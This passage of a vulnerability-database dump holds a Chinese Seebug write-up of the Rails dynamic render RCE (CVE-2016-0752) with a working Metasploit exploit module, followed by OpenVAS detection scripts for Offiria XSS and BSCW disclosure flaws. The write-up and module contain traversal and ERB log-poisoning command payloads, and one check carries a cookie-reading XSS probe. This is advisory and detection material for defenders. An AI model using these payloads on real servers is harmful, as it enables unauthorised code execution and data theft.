\u522b\u5fd8\u4e86\u662f\u4e3a\u4ec0\u4e48\u9020\u6210\u4e86\u8fd9\u6837\u7684\u6f0f\u6d1e\uff0c\u662f\u56e0\u4e3a\u4f60\u9009\u62e9\u4e86\u52a8\u6001\u8bbe\u7f6e\u6a21\u7248\u8def\u5f84\u5bfc\u81f4\u7684\u3002\r\n\r\n```\r\ndef show\r\n render params[:template]\r\nend\r\n```\r\n\r\n> \u8fd9\u53ea\u662f\u4e00\u6bb5\u7247\u6bb5\u5e76\u4e14\u7b80\u5355\u7684\u4ee3\u7801\uff0c\u5c31\u80fd\u9020\u6210\u8fd9\u6837\u7684\u6f0f\u6d1e\uff0c\u6211\u76f8\u4fe1\u6709\u4e0d\u5c11\u5f00\u53d1\u8005\u4f1a\u8fd9\u4e48\u5199\uff0c\u4f46\u662f\u8fd9\u8fd8\u4e0d\u662f\u6700\u7cdf\u7cd5\u7684\u95ee\u9898\u3002\r\n\r\n\u901a\u8fc7 Jeff Jarmoc \u7684\u4e00\u7bc7\u8bba\u6587 \"[The Anatomy of a Rails Vulnerability \u2013 CVE-2014-0130: From Directory Traversal to Shell,](http://matasano.com/research/AnatomyOfRailsVuln-CVE-2014-0130.pdf)\" \u6211\u4eec\u5f97\u77e5\uff0c\u53ef\u4ee5\u901a\u8fc7\u8fd9\u6837\u7684\u6f0f\u6d1e\u83b7\u53d6\u4e00\u4e2a\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c.\r\n\r\nJeff \u7684\u8bba\u6587\u4ecb\u7ecd\u4e86\u4e00\u4e2a\u5728\u67d0\u4e9b\u7248\u672c\u7684 Rails \u62e5\u6709\u4e00\u4e2a\u76f8\u4f3c\u7684\u7f3a\u9677\uff0c Rail\u2019s implicit \u6e32\u67d3\u673a\u5236\u5141\u8bb8\u76ee\u5f55\u904d\u5386, \u6216\u8005\u66f4\u51c6\u786e\u7684\u8bf4, **\u672c\u5730\u6587\u4ef6\u5305\u542b**, \u8fd9\u662f\u4e00\u4e2a\u56e0\u4e3a\u5f00\u53d1\u8005\u5bfc\u81f4\u7684\u6f0f\u6d1e.\r\n\r\n\r\n> \u5728\u6df1\u5165\u6316\u6398\u8fd9\u4e2a\u6f0f\u6d1e\u4e4b\u524d\u6211\u4eec\u5148\u601d\u8003\u4e0b\uff0c\u6211\u4eec\u73b0\u5728\u62e5\u6709\u7684\u662f**\u672c\u5730\u5305\u542b**\uff0c\u800c\u4e0d\u662f\u76ee\u5f55\u904d\u5386. \u4e0d\u8fc7\u6211\u4eec\u62e5\u6709\u7684\u4e00\u4e2a\u4f18\u52bf\u5c31\u662f, \u6211\u4eec\u53ef\u4ee5**\u52a0\u8f7d\u53ef\u6267\u884c\u6587\u4ef6 (ERB)**. \u4f20\u7edf\u610f\u4e49\u4e0a\u6765\u8bf4\u76ee\u5f55\u904d\u5386\u53ea\u80fd\u8fd4\u56de\u4e00\u4e9b\u4e0d\u53ef\u6267\u884c\u7684\u6587\u4ef6\u5185\u5bb9, \u6bd4\u5982\u8bf4 CSV \u6587\u4ef6. \u6240\u4ee5\u4ece\u672c\u8d28\u4e0a\u6765\u8bf4, \u6211\u4eec\u4e0d\u4ec5\u53ef\u4ee5\u8bfb\u53d6\u7a0b\u5e8f\u7684\u6e90\u4ee3\u7801, \u8fd8\u53ef\u4ee5\u8bfb\u53d6\u7cfb\u7edf\u6587\u4ef6, \u800c\u4e14\u6211\u4eec\u8fd8\u80fd\u6267\u884c ruby \u4ee3\u7801\uff0c\u662f\u4e0d\u662f\u5c4c\u5c4c\u7684. \u56e0\u4e3a\u6211\u4eec\u53ef\u4ee5\u6267\u884c ruby \u4ee3\u7801, \u6240\u4ee5\u6211\u4eec\u62e5\u6709\u4e0e web server \u540c\u7ea7\u522b\u7684\u6743\u9650\u53bb\u6267\u884c\u7cfb\u7edf\u547d\u4ee4.\r\n\r\n\u4ece\u6587\u4ef6\u5305\u542b\u5230\u4ee3\u7801\u6267\u884c\uff0c\u6211\u4eec\u9700\u8981\u91c7\u7528\u4e00\u79cd\u53eb\u65e5\u5fd7\u6c61\u67d3\u7684\u624b\u6cd5, \u4f1a\u5c06\u5f53\u524d\u73af\u5883\u7684\u6bcf\u4e00\u4e2a\u8bf7\u6c42\uff0c\u5305\u62ec\u53c2\u6570\u90fd\u4f1a\u5199\u5165\u65e5\u5fd7\u6587\u4ef6 (\u6bd4\u5982\u8bf4 `development.log`). \u5c3d\u7ba1\u662f\u7eaf\u6587\u672c\u6587\u4ef6\uff0c\u53ea\u8981\u662f\u65e5\u5fd7\uff0c\u90fd\u53ef\u4ee5\u88ab\u5305\u542b\u8fdb ruby \u4ee3\u7801. \u901a\u8fc7\u4f7f\u7528\u6709\u6548\u7684 ruby \u4ee3\u7801\u4f5c\u4e3a\u53c2\u6570\u53d1\u8d77\u4e00\u4e2a\u8bf7\u6c42\u4fbf\u53ef\u4ee5\u5b8c\u6210\u4e0a\u8ff0\u8fc7\u7a0b\u3002\r\n\r\n\u5728\u4e0b\u9762\u7684\u4f8b\u5b50\u4e2d\u6211\u4eec\u5411 web \u7a0b\u5e8f\u53d1\u8d77\u4e00\u4e2a\u5408\u6cd5\u7684\u8bf7\u6c42\uff0c\u901a\u8fc7 fake \u53c2\u6570\u4f20\u5165\u4e00\u4e2aURL\u7f16\u7801\u7684`<%= `ls` %>`\u3002\r\n\r\n\r\n\r\n\u901a\u8fc7\u5bf9\u65e5\u5fd7\u6587\u4ef6\u7684\u5ba1\u8ba1\uff0c\u6211\u4eec\u53ef\u4ee5\u770b\u5230\u65e5\u5fd7\u4e2d\u5b58\u5728\u8fd9\u4e48\u4e00\u6761 url decode \u540e\u7684\u53c2\u6570\u6761\u76ee\uff0c\u8fd9\u662f\u4e00\u4e2a\u6709\u6548\u7684 ruby \u4ee3\u7801\uff0c\u5f53 web \u5e94\u7528\u6e32\u67d3\u4e86\u8be5\u65e5\u5fd7\u6587\u4ef6\uff0c\u4ee3\u7801\u5c31\u4f1a\u88ab\u6267\u884c\u3002\r\n\r\n\r\n\r\n\u7136\u540e\u6211\u4eec\u5c31\u53ef\u4ee5\u7528 ruby \u7684\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\uff0c\u5c06\u5305\u542b\u521a\u624d\u7684\u8bf7\u6c42\u7684\u65e5\u5fd7\u5305\u542b\u5c3d\u91cf\uff0c\u521a\u521a\u7684\u53c2\u6570\u5c31\u4f1a\u6267\u884c\u3002\r\n\r\n\r\n\r\n\u5f53\u8bf7\u6c42\u8fd4\u56de\u540e\uff0c\u6211\u4eec\u53ef\u4ee5\u770b\u5230\uff0c\u539f\u6765\u7684 fake \u53c2\u6570\u7684\u503c\u5df2\u7ecf\u88ab `ls` \u547d\u4ee4\u7684\u503c\u66ff\u4ee3\u3002\u901a\u8fc7\u5982\u4e0a\u7684\u65b9\u6cd5\u4e5f\u53ef\u4ee5\u6267\u884c\u5176\u4ed6\u7684\u547d\u4ee4\u4e86\u3002\r\n\r\n<br>\r\n\r\n### \u7ed3\u8bba\r\n\r\n\u5982\u679c\u4e0d\u53bb\u6df1\u5165\u5730\u6316\u6398\u7ec6\u8282\u6216\u8005\u79ef\u6781\u5730\u5c1d\u8bd5 exploit\uff0cRails \u7684\u6e32\u67d3\u673a\u5236\u5c06\u662f\u5f88\u795e\u79d8\u5f88\u96be\u7406\u89e3\u7684\u3002\u5f88\u9057\u61be\uff0cRails \u7684\u53c2\u8003\u6587\u6863\u5728\u8fd9\u65b9\u9762\u5e76\u6ca1\u6709\u591a\u5927\u5e2e\u52a9\u3002\r\n\r\n\u548c CVE-2014-0130 \u7c7b\u4f3c\uff0c \u4f7f\u7528\u52a8\u6001\u6a21\u677f\u6e32\u67d3\u9020\u6210\u4e86\u76ee\u5f55\u904d\u5386\u548c\u4ee3\u7801\u6267\u884c\u3002\u6211\u5df2\u7ecf\u4e0d\u6b62\u4e00\u6b21\u5730\u5728\u5f88\u591a\u5f00\u6e90 Rails \u9879\u76ee\u4e2d\u770b\u5230\u8fc7\u5b58\u5728\u8fd9\u79cd\u6f0f\u6d1e\u4e86\u3002\u5982\u679c\u4f60\u8fd8\u6ca1\u6709\u8bfb\u8fc7 Jeff Jarmoc \u7684\u90a3\u7bc7\u8bba\u6587\uff0c\u6211\u5efa\u8bae\u6700\u597d\u5148\u9605\u8bfb\u4e00\u4e0b\uff0c\u8fd9\u7bc7\u6587\u7ae0\u6df1\u5165\u5730\u6316\u6398\u4e86\u4e0e CVE-2014-0130 \u76f8\u5173\u7684\u6f0f\u6d1e\u548c\u5371\u5bb3\u8bc4\u4f30\u3002\r\n\r\n\u8fd9\u662f\u6211\u5199\u7684\u53ef\u4ee5\u63a2\u6d4b\u548c\u5229\u7528\u672c\u6587\u6240\u8ff0\u6f0f\u6d1e\u7684 msf module: : https://gist.github.com/forced-request/5158759a6418e6376afb\r\n\r\n\r\n\r\n \r\n> \u4ee5\u4e0a\u4e2d\u6587\u7ffb\u8bd1\u6765\u81ea\u4e8e\uff1ahttps://www.92aq.com/2016/01/27/ruby-on-rails-%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C.html\r\n> \u82f1\u6587\u539f\u6587\u5730\u5740\uff1ahttps://nvisium.com/blog/2016/01/26/rails-dynamic-render-to-rce-cve-2016-0752/\r\n\r\n\r\n<br>\r\n\r\n### \u65f6\u95f4\u7ebf\r\n\r\n* 2015\u5e742\u67081\u65e5 \u6f0f\u6d1e\u88ab\u53d1\u73b0\r\n* 2015\u5e742\u670810\u65e5 Rails team \u51b3\u5b9a\u4fee\u590d\u8be5\u6f0f\u6d1e\r\n* 2015\u5e747\u670813\u65e5 \u6f0f\u6d1e\u5728\u672a\u516c\u5f00\u60c5\u51b5\u4e0b\u5f97\u5230\u8bc1\u5b9e\uff08\u8ddd\u7b2c\u4e00\u6b21\u62a5\u544a\u8be5\u6f0f\u6d1e\u5df2\u7ecf\u6709 5 \u4e2a\u6708\u65f6\u95f4\uff09\r\n* 2016\u5e741\u670825\u65e5 \u9488\u5bf9\u8be5\u6f0f\u6d1e\u7684\u8865\u4e01\u6b63\u5f0f\u53d1\u5e03\uff0c\u5e76\u4e14\u8be5\u6f0f\u6d1e\u88ab CVE \u6536\u5f55\uff08\u8fd1 5 \u4e2a\u6708\u624d\u8bc1\u5b9e\u8be5\u6f0f\u6d1e\uff0c\u5c06\u8fd1 1 \u5e74\u624d\u4fee\u590d\u8be5\u6f0f\u6d1e\uff09\r\n* 2016\u5e741\u670827\u65e5 Seebug \u6536\u5f55\u8be5\u6f0f\u6d1e\r\n\r\n<br/>\r\n\r\n### \u6f0f\u6d1e\u8bc1\u660e\r\n\r\n**\u6f0f\u6d1e\u5e94\u7528**\r\n\r\n\u6d4b\u8bd5\u73af\u5883\uff1aRails-4.1.5 (Ruby-2.1.5)\r\n\u6d4b\u8bd5\u7cfb\u7edf\uff1aKali Linux 2.0\r\n\r\n\u521b\u5efa Rails \u5e94\u7528\uff1a\r\n\r\n```\r\nrails new cve-2016-0752\r\ncd cve-2016-0752\r\n```\r\n\r\n\u4f7f\u7528\u81ea\u5e26\u547d\u4ee4\u521b\u5efa\u63a7\u5236\u5668`vuln`\u8def\u7531`index`\uff0c\u5e76\u4fee\u6539\u5176\u8def\u7531\u9ed8\u8ba4\u5904\u7406\u4ee3\u7801\uff1a\r\n\r\n```\r\nrails generate controller vuln index\r\n```\r\n\r\n\u4fee\u6539`app/controllers/vuln_controller.rb`\u4e2d`index`\u51fd\u6570\u4ee3\u7801\u4e3a\uff1a\r\n\r\n```\r\nclass VulnController < ApplicationController\r\n def index\r\n render params[:q]\r\n end\r\nend\r\n```\r\n\r\n\u542f\u52a8\u5e94\u7528\u8bbf\u95ee `http://192.168.199.205:3000/vuln/index?q=/etc/passwd` \u65f6\uff0c\u4ee3\u7801\u4f1a\u5c06 `/etc/passwd` \u505a\u4e3a\u6a21\u7248\u76f8\u5bf9\u4f7f\u7528\u51fd\u6570 render \u8fdb\u884c\u6e32\u67d3\uff0c\u800c render \u51fd\u6570\u5728\u5bfb\u627e\u6a21\u7248\u6587\u4ef6\u65f6\u9ed8\u8ba4\u5305\u542b\u4e86\u7cfb\u7edf\u6839\u8def\u5f84\uff0c\u5728\u5e94\u7528\u9ed8\u8ba4\u7684\u6a21\u7248\u5b58\u50a8\u8def\u5f84\u4e2d\u65e0\u6cd5\u627e\u5230 `/etc/passwd` \u65f6\u56de\u53bb\u5bfb\u627e `//etc/passwd`\uff0c\u8fd9\u65f6\u5982\u679c\u80fd\u591f\u8bbf\u95ee\u5230 `//etc/passwd` \u6587\u4ef6\uff0c\u5e94\u7528\u4f1a\u5c06\u5176\u6587\u4ef6\u5185\u5bb9\u4f5c\u4e3a\u6a21\u7248\u8fdb\u884c\u6e32\u67d3\uff1a\r\n\r\n\r\n\r\n**\u914d\u5408\u8bbf\u95ee\u65e5\u5fd7\u6267\u884c\u547d\u4ee4**\r\n\r\nRails\u5e94\u7528\u6587\u4ef6log/development.log\u5b58\u50a8\u7684\u662f\u7528\u6237\u8bbf\u95ee\u65e5\u5fd7\uff0c\u6839\u636e2.1\u73b0\u5728\u5df2\u7ecf\u80fd\u63a7\u5236\u6e32\u67d3\u7684\u6a21\u677f\u6587\u4ef6\u8def\u5f84\uff0c\u501f\u52a9\u8bbf\u95ee\u65e5\u5fd7\u5c31\u53ef\u4ee5\u63a7\u5236\u6e32\u67d3\u6a21\u7248\u7684\u5185\u5bb9\u3002\u501f\u52a9Rails\u7684\u6a21\u677f\u5f15\u64ce\uff0c\u5728\u6a21\u677f\u5185\u5bb9\u4e2d\u63d2\u5165\u6a21\u677f\u5143\u7d20<%= `ifconfig` %>\uff0c\u8868\u793a\u5c06 ifconfig \u7cfb\u7edf\u547d\u4ee4\u7684\u7ed3\u679c\u4f5c\u4e3a\u6e32\u67d3\u5185\u5bb9\u8fdb\u884c\u8fd4\u56de\u3002\r\n\r\n\u8bbf\u95eehttp://192.168.199.205:3000/vuln/index?q=<%25=%20`ifconfig`%20%25>\uff0c\u4f1a\u5728log/development.log\u4e2d\u7559\u4e0b\u8bb0\u5f55\uff1a\r\n\r\n\r\n\r\n\u8fd9\u65f6\u901a\u8fc7\u63a7\u5236\u6a21\u7248\u6587\u4ef6\u6e32\u67d3\u4e3alog/development.log\uff0c\u5373\u53ef\u5c06\u76ee\u6807\u4e3b\u673a\u7684\u7f51\u7edc\u4fe1\u606f\u901a\u8fc7\u9875\u9762\u7ed3\u679c\u8fd4\u56de\uff0chttp://192.168.199.205:3000/vuln/index?q=../../log/development.log\uff1a\r\n\r\n\r\n\r\n### \u6f0f\u6d1e\u5f71\u54cd\r\n\r\n\u4ece zoomeye.org \u4e0a\u641c\u7d22\u4f7f\u7528\u4e86 Rails \u6846\u67b6\u7684\u7ad9\u70b9\uff1a\r\n\r\n\r\n\r\n\u5168\u7403\u5927\u7ea6\u6709**12w**\u4e2a\u4f7f\u7528\u4e86Rails\u7684\u7ad9\u70b9**\u53ef\u80fd**\u53d7\u5230\u8be5\u6f0f\u6d1e\u7684\u5f71\u54cd\u3002\r\n\r\n\u540c\u65f6\u4e5f\u53ef\u4ee5\u5728 Github \u4e0a\u641c\u7d22 `render params` \u6765\u67e5\u770b\u6f5c\u5728\u53d7\u5230\u5f71\u54cd\u7684 \u9879\u76ee:\r\n\r\n\r\n\r\n\u53ef\u4ee5\u770b\u5230\u4e5f\u6709\u5927\u91cf\u7684\u9879\u76ee\u7b26\u5408\u8fd9\u6837\u7684\u4ee3\u7801\u5199\u6cd5,\u53ef\u80fd\u53d7\u5230\u8be5\u6f0f\u6d1e\u7684\u5f71\u54cd\u3002", "modified": "2016-01-27T00:00:00", "published": "2016-01-27T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-90633", "id": "SSV:90633", "type": "seebug", "title": "Rails Dynamic Render \u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e (CVE-2016-0752)", "sourceData": "\n require 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n @@trav_string = '%5c%2e%2e%2f'\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Ruby on Rails Dynamic Render Directory Traversal + Code Exec',\r\n 'Description' => %q{\r\n This module exploits a remote code execution vulnerability in the explicit render\r\n method when leveraging user parameters.\r\n This module has been tested across multiple versions of RoR 3.x and RoR 4.x\r\n The technique used by this module requires the specified endpoint to be using\r\n dynamic render paths, such as the following example:\r\n def show\r\n render params[:id]\r\n end\r\n },\r\n 'Author' =>\r\n [\r\n 'John Poulin (forced-request)'\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'ruby',\r\n 'Arch' => ARCH_CMD,\r\n 'Payload' => \r\n {\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'generic perl telnet'\r\n }\r\n },\r\n 'Privileged' => true,\r\n 'Targets' =>\r\n [\r\n [ 'CMD',\r\n {\r\n 'Arch' => ARCH_CMD,\r\n 'Platform' => 'unix'\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(80),\r\n OptString.new('URIPATH', [ true, 'The path to the vulnerable route', \"/user\"]),\r\n OptString.new('LOGFILE', [ true, 'The environment\\'s log file', 'log%2fdevelopment%2elog']),\r\n OptEnum.new('HTTP_METHOD', [true, 'HTTP Method', 'GET', ['GET', 'POST', 'PUT'] ]),\r\n OptString.new('COOKIES', [ false, 'HTTP headers, including auth headers and cookies', ''])\r\n ], self.class)\r\n end\r\n\r\n def vuln\r\n desired_location = 'Gemfile'\r\n\r\n # Initial payload\r\n p = desired_location\r\n\r\n # Search for depth up to 10 to detect if server is vuln\r\n 11.times do |i|\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(datastore['URIPATH'], p),\r\n 'method' => datastore['HTTP_METHOD'],\r\n 'cookie' => datastore['COOKIES']\r\n }, 60)\r\n\r\n # Check if response contains Gemfile info\r\n if res.body.match(/^gem /)\r\n @depth = i\r\n print_good(\"It appears that this application is vulnerable\")\r\n return true\r\n end\r\n\r\n # Prepare next payload\r\n p = @@trav_string + p\r\n end\r\n return false\r\n end\r\n\r\n def send_payload\r\n p = datastore['LOGFILE']\r\n (@depth).times do |i|\r\n p = @@trav_string + p\r\n end\r\n\r\n p = p + \"?p=%3c%25%20%60\" + CGI::escape(payload.encoded) + \"%60%25%3e\"\r\n print_status(\"Sending payload: #{p}\")\r\n\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(datastore['URIPATH'], p),\r\n 'method' => datastore['HTTP_METHOD'],\r\n 'cookie' => datastore['COOKIES']\r\n }, 60)\r\n end\r\n\r\n def render_log\r\n p = datastore['LOGFILE']\r\n (@depth).times do |i|\r\n p = @@trav_string + p\r\n end\r\n\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(datastore['URIPATH'], p),\r\n 'method' => datastore['HTTP_METHOD'],\r\n 'cookie' => datastore['COOKIES']\r\n }, 60)\r\n end\r\n\r\n #\r\n # Send the actual request\r\n #\r\n def exploit\r\n print_status(\"Sending initial request to detect exploitability\")\r\n\r\n # Check if vulnerable\r\n if vuln\r\n print_status(\"Attempting to exploit\")\r\n \r\n send_payload\r\n else\r\n print_error(\"Application does not appear vulnerable\")\r\n end\r\n end\r\nend\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-90633"}], "openvas": [{"lastseen": "2019-05-29T18:36:51", "bulletinFamily": "scanner", "description": "The host is running Offiria and is prone\n to cross site scripting vulnerability.", "modified": "2018-10-12T00:00:00", "published": "2015-05-27T00:00:00", "id": "OPENVAS:1361412562310805191", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805191", "title": "Offiria Cross-Site Scripting Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_offiria_cross_site_scripting_vuln.nasl 11872 2018-10-12 11:22:41Z cfischer $\n#\n# Offiria Cross-Site Scripting Vulnerability\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:slashes&dots:offria\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805191\");\n script_version(\"$Revision: 11872 $\");\n script_cve_id(\"CVE-2014-2689\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 13:22:41 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-05-27 16:23:32 +0530 (Wed, 27 May 2015)\");\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_name(\"Offiria Cross-Site Scripting Vulnerability\");\n\n script_tag(name:\"summary\", value:\"The host is running Offiria and is prone\n to cross site scripting vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted request via HTTP GET and\n check whether it is able to read cookie or not.\");\n\n script_tag(name:\"insight\", value:\"Flaw is due to insufficient sanitization\n of user-supplied data in URI after '/installer/index.php' script is not\n removed from the system by default.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to create a specially crafted request that would execute arbitrary\n script code in a user's browser session within the trust relationship between\n their browser and the server.\");\n\n script_tag(name:\"affected\", value:\"Offiria version 2.1.1 and probably prior.\");\n\n script_tag(name:\"solution\", value:\"As a workaround remove the vulnerable\n script or restrict access to it via .htaccess file or WAF.\");\n\n script_tag(name:\"solution_type\", value:\"Workaround\");\n\n script_xref(name:\"URL\", value:\"https://www.htbridge.com/advisory/HTB23210\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/532048\");\n script_xref(name:\"URL\", value:\"http://www.zerodaylab.com/vulnerabilities/CVE-2014/CVE-2014-2689.html\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_offiria_remote_detect.nasl\");\n script_mandatory_keys(\"offiria/installed\");\n script_require_ports(\"Services/www\", 80);\n\n script_xref(name:\"URL\", value:\"https://offiria.com\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nif(!http_port = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!appDir = get_app_location(cpe:CPE, port:http_port)){\n exit(0);\n}\n\nurl = appDir + '/installer/index.php/\"onmouseover=\"alert(document.cookie) ;\"=\">';\n\nif(http_vuln_check(port:http_port, url:url, check_header:TRUE,\n pattern:\"alert\\(document.cookie\\)\", extra_check:\">Offiria Installation<\"))\n{\n report = report_vuln_url( port:http_port, url:url );\n security_message(port:http_port, data:report);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:37:39", "bulletinFamily": "scanner", "description": "This host is installed with OrbiTeam BSCW and is prone to information\n disclosure vulnerability.", "modified": "2018-10-19T00:00:00", "published": "2014-05-16T00:00:00", "id": "OPENVAS:1361412562310804297", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804297", "title": "OrbiTeam BSCW 'op' Parameter Information Disclosure Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_orbiteam_bscw_info_disc_vuln.nasl 11974 2018-10-19 06:22:46Z cfischer $\n#\n# OrbiTeam BSCW 'op' Parameter Information Disclosure Vulnerability\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804297\");\n script_version(\"$Revision: 11974 $\");\n script_cve_id(\"CVE-2014-2301\");\n script_bugtraq_id(67284);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-19 08:22:46 +0200 (Fri, 19 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-05-16 11:22:00 +0530 (Fri, 16 May 2014)\");\n script_name(\"OrbiTeam BSCW 'op' Parameter Information Disclosure Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is installed with OrbiTeam BSCW and is prone to information\n disclosure vulnerability.\");\n script_tag(name:\"vuldetect\", value:\"Send the crafted HTTP GET request and check is it possible to read\n the filename of a document.\");\n script_tag(name:\"insight\", value:\"The flaw exists as the program associates filenames of documents with values\n mapped from the 'op' parameter.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to gain sensitive\n information by enumerating the names of all objects stored in BSCW without prior authentication.\");\n script_tag(name:\"affected\", value:\"OrbiTeam BSCW before version 5.0.8\");\n script_tag(name:\"solution\", value:\"Upgrade to OrbiTeam BSCW version 5.0.8 or later.\");\n\n script_xref(name:\"URL\", value:\"http://seclists.org/bugtraq/2014/May/37\");\n script_xref(name:\"URL\", value:\"https://xforce.iss.net/xforce/xfdb/93030\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/126551\");\n script_xref(name:\"URL\", value:\"https://www.redteam-pentesting.de/en/advisories/rt-sa-2014-003\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\");\n script_require_ports(\"Services/www\", 80);\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_app\");\n script_xref(name:\"URL\", value:\"http://www.bscw.de/english/product.html\");\n exit(0);\n}\n\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nbscwPort = get_http_port(default:80);\n\nrcvRes = http_get_cache(item:\"/\", port:bscwPort);\n\nif(\">BSCW administrator<\" >!< rcvRes){\n exit(0);\n}\n\nreq = http_get(item:\"/pub/bscw.cgi/?op=inf\", port:bscwPort);\nrcvRes = http_keepalive_send_recv(port:bscwPort, data:req, bodyonly:TRUE);\nif('\"banner ruled_banner\"' >< rcvRes)\n{\n ##Grab the relocated link\n rcvRes = eregmatch(pattern:'The document can be found <A HREF=\"' +\n 'http://.*(/pub/bscw.cgi/(.*)/?op=inf)\">here', string:rcvRes);\n if(rcvRes[1]){\n url = rcvRes[1];\n }\n\n req = http_get(item:url, port:bscwPort);\n rcvRes = http_keepalive_send_recv(port:bscwPort, data:req, bodyonly:TRUE);\n if(\"server_logo_bscw.jpg\" >< rcvRes)\n {\n rcvRes = eregmatch(pattern:'The document can be found <A HREF=\"' +\n 'http://.*(/pub/bscw.cgi/(.*)/?op=inf)\">here', string:rcvRes);\n if(rcvRes[1]){\n url = rcvRes[1];\n }\n\n req = http_get(item:url, port:bscwPort);\n rcvRes = http_send_recv(port:bscwPort, data:req, bodyonly:TRUE);\n\n if(rcvRes && rcvRes =~ '<td.*class=\"iValueB\".*width=.*\">(.*)</td>')\n {\n security_message(port:bscwPort);\n exit(0);\n }\n }\n}\n\nexit(99);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:37:46", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-04-10T00:00:00", "id": "OPENVAS:1361412562310867678", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867678", "title": "Fedora Update for mediawiki FEDORA-2014-4511", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-4511\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You 